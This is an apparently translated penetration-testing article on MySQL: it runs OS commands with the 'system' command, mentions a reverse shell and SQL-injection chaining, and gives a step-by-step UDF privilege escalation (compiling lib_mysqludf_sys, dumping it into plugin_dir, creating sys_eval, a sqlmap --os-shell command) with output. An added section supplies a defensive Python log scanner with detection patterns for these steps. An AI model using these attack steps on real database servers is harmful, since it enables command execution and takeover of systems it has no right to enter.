1. The system command in MySQL
MySQL 5.x added the system command (short form \!), which lets you execute an operating-system command from the MySQL prompt:

    mysql> system echo "12345"
    12345

On a whim: this method can also be used to spawn a reverse shell.
The result was OK:
Trying to chain it with a select statement also succeeded.
This suggests it could be spliced into a SQL injection statement to execute OS commands, or used to get a shell through OS commands after connecting to MySQL directly.
2. MySQL UDF privilege escalation
The examples here use a Linux-based operating system; Windows on the server side is really boring, although there are many such servers. Download https://github.com/mysqludf/lib_mysqludf_sys, unpack it (or git clone it directly), enter the directory, and compile:

    gcc -DMYSQL_DYNAMIC_PLUGIN -fPIC -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so

If you encounter an error:

    In file included from lib_mysqludf_sys.c:
    /usr/include/mysql/my_global.h:626: file or directory

you can make the following modification: edit the /usr/include/mysql/my_global.h file, comment out line 626, and recompile. Then use Hex.hta to get the hexadecimal encoding of the compiled library.

    mysql> show variables like '%plugin%';
    +---------------+-------------------------+
    | Variable_name | Value                   |
    +---------------+-------------------------+
    | plugin_dir    | /usr/lib64/mysql/plugin |
    +---------------+-------------------------+
    1 row in set (0.00 sec)

    mysql> select * from func; # check whether someone has already exported a UDF
    mysql> select unhex('hexcode') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';
    Query OK, 1 row affected (0.01 sec) # requires write permission on the /usr/lib64/mysql/plugin/ directory
    mysql> create function sys_eval returns string soname 'mysqludf.so';
    Query OK, 0 rows affected (0.00 sec)
    mysql> select sys_eval('whoami');
    +--------------------+
    | sys_eval('whoami') |
    +--------------------+
    | mysql              |
    +--------------------+
    1 row in set (0.03 sec)

    mysql> select * from func;
    +----------+-----+-------------+----------+
    | name     | ret | dl          | type     |
    +----------+-----+-------------+----------+
    | sys_eval |   0 | mysqludf.so | function |
    +----------+-----+-------------+----------+
    1 row in set (0.00 sec)

    mysql> drop function sys_eval;
    Query OK, 0 rows affected (0.00 sec)

    mysql> select * from func;
    Empty set (0.00 sec)

Or use sqlmap to perform the privilege escalation:

    sqlmap -d "mysql://root:[email protected]:3306/test" --os-shell    # "test" is the database name

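For defenders, the UDF steps above leave recognizable statements in the query log. The following is an added example, not code from the original article: it scans statement text for a dumpfile write into plugin_dir, a CREATE FUNCTION ... SONAME, and calls to the functions exported by lib_mysqludf_sys. The scan_statements name and the sample statements are constructed for illustration.

```python
import posixpath
import re

# Functions exported by lib_mysqludf_sys (sys_eval is the one used above).
SYS_UDFS = ("sys_eval", "sys_exec", "sys_get", "sys_set")

DUMPFILE_RE = re.compile(r"\binto\s+dumpfile\s+'([^']+)'", re.I)
CREATE_UDF_RE = re.compile(
    r"\bcreate\s+(?:aggregate\s+)?function\s+`?(\w+)`?\s+returns\s+\w+"
    r"\s+soname\s+'([^']+)'", re.I)
CALL_RE = re.compile(r"\b(" + "|".join(SYS_UDFS) + r")\s*\(", re.I)


def scan_statements(statements, plugin_dir):
    """Return (index, rule, detail) findings for UDF-abuse indicators."""
    plugin_dir = posixpath.normpath(plugin_dir) + "/"
    findings = []
    for i, sql in enumerate(statements):
        m = DUMPFILE_RE.search(sql)
        if m:
            # Normalize so '..' segments cannot hide the real target directory.
            target = posixpath.normpath(m.group(1))
            if target.startswith(plugin_dir):
                findings.append((i, "dumpfile-into-plugin-dir", target))
        m = CREATE_UDF_RE.search(sql)
        if m:
            findings.append((i, "create-udf", f"{m.group(1)} from {m.group(2)}"))
            continue  # registration already reported; do not also count it as a call
        m = CALL_RE.search(sql)
        if m:
            findings.append((i, "sys-udf-call", m.group(1).lower()))
    return findings


# Constructed sample: statement text as it might be extracted from a query log.
SAMPLE = [
    "select * from func",
    "select unhex('hexcode') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so'",
    "create function sys_eval returns string soname 'mysqludf.so'",
    "select sys_eval('whoami')",
    "select name into dumpfile '/tmp/report.bin' from t",
    "drop function sys_eval",
]

if __name__ == "__main__":
    for idx, rule, detail in scan_statements(SAMPLE, "/usr/lib64/mysql/plugin"):
        print(f"statement {idx}: {rule}: {detail}")
```

Rows in the func table that nobody on the team registered, as checked with select * from func above, are the persistent counterpart of these log findings.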
MySQL system command and UDF privilege escalation in penetration testing